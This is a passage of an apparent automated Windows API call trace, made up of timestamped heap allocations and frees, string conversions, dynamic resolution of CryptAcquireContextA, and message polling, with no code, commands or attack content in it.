hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.563] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0267.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466db0 [0267.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.564] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.565] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.569] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.570] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.574] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.575] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.576] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.576] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.576] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.577] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 